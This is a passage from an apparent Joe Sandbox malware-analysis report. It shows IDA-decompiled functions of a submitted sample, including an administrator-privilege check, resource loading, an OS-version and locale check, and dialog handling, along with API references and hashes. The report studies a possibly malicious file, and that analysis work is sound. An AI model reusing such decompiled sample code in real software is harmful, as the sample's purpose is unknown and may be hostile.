                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6119372248611BBDF136F249C0CBAA3A6CFB4B721F110712F825D51F0DB769A41D796
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                    			E003918A3(void* __edx, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t51 = __esi;
                                                                                                                                                                                                    				_t49 = __edx;
                                                                                                                                                                                                    				_t23 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                    				_t25 =  *0x398128; // 0x2
                                                                                                                                                                                                    				_t45 = 0;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t50 = 2;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if(_t25 != _t50) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					return E00396CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E003917EE( &_v20) != 0) {
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                    						 *0x398128 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x398128 = 1;
                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x003918a3
                                                                                                                                                                                                    0x003918a3
                                                                                                                                                                                                    0x003918ab
                                                                                                                                                                                                    0x003918b2
                                                                                                                                                                                                    0x003918b5
                                                                                                                                                                                                    0x003918be
                                                                                                                                                                                                    0x003918c0
                                                                                                                                                                                                    0x003918c6
                                                                                                                                                                                                    0x003918c7
                                                                                                                                                                                                    0x003918ca
                                                                                                                                                                                                    0x003918cf
                                                                                                                                                                                                    0x003919c9
                                                                                                                                                                                                    0x003919d8
                                                                                                                                                                                                    0x003919d8
                                                                                                                                                                                                    0x003918df
                                                                                                                                                                                                    0x003919b8
                                                                                                                                                                                                    0x003919bd
                                                                                                                                                                                                    0x003919bf
                                                                                                                                                                                                    0x003919bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003919bd
                                                                                                                                                                                                    0x003918fa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391912
                                                                                                                                                                                                    0x003919aa
                                                                                                                                                                                                    0x003919ad
                                                                                                                                                                                                    0x003919b3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391927
                                                                                                                                                                                                    0x00391927
                                                                                                                                                                                                    0x00391932
                                                                                                                                                                                                    0x00391936
                                                                                                                                                                                                    0x003919a9
                                                                                                                                                                                                    0x003919a9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003919a9
                                                                                                                                                                                                    0x0039194c
                                                                                                                                                                                                    0x003919a2
                                                                                                                                                                                                    0x003919a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039196e
                                                                                                                                                                                                    0x00391970
                                                                                                                                                                                                    0x00391999
                                                                                                                                                                                                    0x0039199c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039199c
                                                                                                                                                                                                    0x00391972
                                                                                                                                                                                                    0x00391972
                                                                                                                                                                                                    0x00391975
                                                                                                                                                                                                    0x00391984
                                                                                                                                                                                                    0x00391985
                                                                                                                                                                                                    0x0039198a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039198c
                                                                                                                                                                                                    0x00391991
                                                                                                                                                                                                    0x00391996
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391996
                                                                                                                                                                                                    0x0039194c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003918DD), ref: 0039181A
                                                                                                                                                                                                      • Part of subcall function 003917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0039182C
                                                                                                                                                                                                      • Part of subcall function 003917EE: AllocateAndInitializeSid.ADVAPI32(003918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003918DD), ref: 00391855
                                                                                                                                                                                                      • Part of subcall function 003917EE: FreeSid.ADVAPI32(?,?,?,?,003918DD), ref: 00391883
                                                                                                                                                                                                      • Part of subcall function 003917EE: FreeLibrary.KERNEL32(00000000,?,?,?,003918DD), ref: 0039188A
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003918EB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 003918F2
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0039190A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00391918
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0039192C
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00391944
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00391964
                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0039197A
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0039199C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 003919A3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003919AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                    • Opcode ID: 2d399ad3806934c313a3bf2946d58aa9ad466cab713004f500eb6be166861401
                                                                                                                                                                                                    • Instruction ID: 6625142d02770b48f0c4d4c9f59f4990f4f191aed8e278f7d2d76e6dfc32a5d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d399ad3806934c313a3bf2946d58aa9ad466cab713004f500eb6be166861401
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44311E71A0060AAFDF229FA5DC58ABFBBBCFF45740F100526E545E2260D7329905CBA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E0039468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				CHAR* _t14;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				long _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                    				_t11 = __edx;
                                                                                                                                                                                                    				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                    				_t16 = _t4;
                                                                                                                                                                                                    				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                    					if(_t16 == 0) {
                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                    					FreeResource(_t15);
                                                                                                                                                                                                    					return _t16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00394699
                                                                                                                                                                                                    0x0039469b
                                                                                                                                                                                                    0x003946a9
                                                                                                                                                                                                    0x003946af
                                                                                                                                                                                                    0x003946b4
                                                                                                                                                                                                    0x003946bc
                                                                                                                                                                                                    0x003946f9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003946f9
                                                                                                                                                                                                    0x003946d9
                                                                                                                                                                                                    0x003946dd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003946e5
                                                                                                                                                                                                    0x003946ef
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003946f5
                                                                                                                                                                                                    0x003946ff

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: TITLE$nst0dum
                                                                                                                                                                                                    • API String ID: 3370778649-1250357435
                                                                                                                                                                                                    • Opcode ID: ef501707995ed90aff0f733da9b3337f9b8366175994a02888e79e92506df9a9
                                                                                                                                                                                                    • Instruction ID: a9133d93b41a02f4af16b70741b13aa9be242189a36237827b7a5eeb40eb4e37
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef501707995ed90aff0f733da9b3337f9b8366175994a02888e79e92506df9a9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D60128722407007BE7221BA56C0DF2B3E2CDBCAF62F050116FE4987280C9B28C4282F2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E0039681F(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                    				int* _v176;
                                                                                                                                                                                                    				int _v180;
                                                                                                                                                                                                    				int _v184;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t36 = __ebx;
                                                                                                                                                                                                    				_t19 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                    				_t41 =  *0x3981d8; // 0x0
                                                                                                                                                                                                    				_t43 = 0;
                                                                                                                                                                                                    				_v180 = 0xc;
                                                                                                                                                                                                    				_v176 = 0;
                                                                                                                                                                                                    				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                    					 *0x3981d8 = 0;
                                                                                                                                                                                                    					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    						_t41 =  *0x3981d8; // 0x0
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t41 = 1;
                                                                                                                                                                                                    						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t31 = RegQueryValueExA(_v172, 0x391140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                    							_t43 = _t31;
                                                                                                                                                                                                    							RegCloseKey(_v172);
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t40 =  &_v176;
                                                                                                                                                                                                    								if(E003966F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                    									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                    										 *0x3981d8 = _t41;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t18 =  &_v8; // 0x39463b
                                                                                                                                                                                                    				return E00396CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x0039681f
                                                                                                                                                                                                    0x0039682a
                                                                                                                                                                                                    0x00396831
                                                                                                                                                                                                    0x00396836
                                                                                                                                                                                                    0x0039683c
                                                                                                                                                                                                    0x0039683e
                                                                                                                                                                                                    0x00396848
                                                                                                                                                                                                    0x00396851
                                                                                                                                                                                                    0x0039685d
                                                                                                                                                                                                    0x00396864
                                                                                                                                                                                                    0x00396876
                                                                                                                                                                                                    0x0039693a
                                                                                                                                                                                                    0x0039693a
                                                                                                                                                                                                    0x0039687c
                                                                                                                                                                                                    0x0039687e
                                                                                                                                                                                                    0x00396885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003968d6
                                                                                                                                                                                                    0x003968f4
                                                                                                                                                                                                    0x00396900
                                                                                                                                                                                                    0x00396902
                                                                                                                                                                                                    0x0039690a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039690c
                                                                                                                                                                                                    0x0039690c
                                                                                                                                                                                                    0x0039691c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039691e
                                                                                                                                                                                                    0x00396924
                                                                                                                                                                                                    0x0039692b
                                                                                                                                                                                                    0x00396932
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039692b
                                                                                                                                                                                                    0x0039691c
                                                                                                                                                                                                    0x0039690a
                                                                                                                                                                                                    0x00396885
                                                                                                                                                                                                    0x00396876
                                                                                                                                                                                                    0x00396940
                                                                                                                                                                                                    0x00396951

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0039686E
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 003968A7
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003968CC
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,?,0000000C), ref: 003968F4
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00396902
                                                                                                                                                                                                      • Part of subcall function 003966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0039691A), ref: 00396741
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                    • String ID: ;F9$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                    • API String ID: 3346862599-1880301537
                                                                                                                                                                                                    • Opcode ID: 8345cf4033de02ea654ad45271ce13b9a13560d65d9a987e36d13bbadea3df1b
                                                                                                                                                                                                    • Instruction ID: 2aefeb7eb0c11e23cf2c0ddbbf2724fc4ed7cd9048319d79a919155c455ecdcf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8345cf4033de02ea654ad45271ce13b9a13560d65d9a987e36d13bbadea3df1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40314431A022289FDF33CB51DC46FAA777CEB85758F0101A7E949A6150DB319D85CF92
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                    			E003917EE(intOrPtr* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t37 = __ecx;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v28 = __ecx;
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                    					_v20 = _t20;
                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                    							 *0x39a288(0, _v24, _v28);
                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x003917f6
                                                                                                                                                                                                    0x003917fd
                                                                                                                                                                                                    0x00391805
                                                                                                                                                                                                    0x0039180b
                                                                                                                                                                                                    0x0039180d
                                                                                                                                                                                                    0x00391815
                                                                                                                                                                                                    0x00391818
                                                                                                                                                                                                    0x00391820
                                                                                                                                                                                                    0x00391824
                                                                                                                                                                                                    0x0039182c
                                                                                                                                                                                                    0x00391832
                                                                                                                                                                                                    0x00391837
                                                                                                                                                                                                    0x00391851
                                                                                                                                                                                                    0x00391854
                                                                                                                                                                                                    0x0039185d
                                                                                                                                                                                                    0x00391862
                                                                                                                                                                                                    0x0039186c
                                                                                                                                                                                                    0x00391872
                                                                                                                                                                                                    0x00391877
                                                                                                                                                                                                    0x0039187e
                                                                                                                                                                                                    0x0039187e
                                                                                                                                                                                                    0x00391883
                                                                                                                                                                                                    0x00391883
                                                                                                                                                                                                    0x0039185d
                                                                                                                                                                                                    0x0039188a
                                                                                                                                                                                                    0x0039188a
                                                                                                                                                                                                    0x003918a2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003918DD), ref: 0039181A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0039182C
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(003918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003918DD), ref: 00391855
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,003918DD), ref: 00391883
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,003918DD), ref: 0039188A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                    • Opcode ID: 1493e329ffe878272716427aa9d552c5c6a0ed2961704397c042bd5836d51d86
                                                                                                                                                                                                    • Instruction ID: 966cec47a6b564def16d01d7e4ff0164f8c267ea2927e3588a1a62af0ef5a706
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1493e329ffe878272716427aa9d552c5c6a0ed2961704397c042bd5836d51d86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5116371E00209ABDB129FA4DC4AABEBB7CEF44701F11056AFA15E2390DA719D049BD5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00393450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t7 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                    					EndDialog(_a4, 2);
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t7 - 0x100;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					_t12 = GetDesktopWindow();
                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                    					E003943D0(_t24, _t12);
                                                                                                                                                                                                    					SetWindowTextA(_t24, "nst0dum");
                                                                                                                                                                                                    					SetDlgItemTextA(_t24, 0x838,  *0x399404);
                                                                                                                                                                                                    					SetForegroundWindow(_t24);
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t11 == 1) {
                                                                                                                                                                                                    					_t22 = _a12;
                                                                                                                                                                                                    					if(_t22 < 6) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
